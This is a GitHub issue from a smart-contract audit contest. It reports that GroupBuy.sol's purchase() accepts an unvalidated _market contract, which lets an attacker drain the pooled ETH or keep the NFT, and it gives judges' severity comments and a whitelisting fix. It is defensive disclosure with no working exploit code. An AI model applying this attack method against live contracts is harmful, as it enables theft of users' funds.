-
Notifications
You must be signed in to change notification settings - Fork 1
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Attacker can steal the amount collected so far in the GroupBuy for NFT purchase. #47
Comments
HickupHH3 marked the issue as primary issue |
While #39 has better formatting, I found this report's POC and description to be more succinct. |
HickupHH3 marked the issue as selected for report |
mehtaculous marked the issue as sponsor confirmed |
Agree with High severity. Solution is to check that the |
Lines of code
https://github.com/code-423n4/2022-12-tessera/blob/f37a11407da2af844bbfe868e1422e3665a5f8e4/src/modules/GroupBuy.sol#L204
Vulnerability details
Description
purchase() in GroupBuy.sol executes the purchase call for the group. After safety checks, the NFT is bought with _market's execute() function. Supposedly it deploys a vault which owns the NFT. The code makes sure the vault is the new owner of the NFT and exits.
The issue is that _market user-supplied variable is not validated at all. Attacker can pass their malicious contract, which uses the passed funds to buy the NFT and store it in attacker's wallet. It will return the NFT-holding wallet so the checks will pass. As a result, attacker has the NFT while they could have contributed nothing to the GroupBuy. Attacker can also just steal the supplied ETH and return the current address which holds the NFT.
Impact
Attacker can steal the amount collected so far in the GroupBuy for NFT purchase.
Proof of Concept
minReservePrices[_poolId] * filledQuantities[_poolId]
, as checked in line 182.Tools Used
Manual audit
Recommended Mitigation Steps
_market should be whitelisted, or supplied in createPool stage and able to be scrutinized.
The text was updated successfully, but these errors were encountered: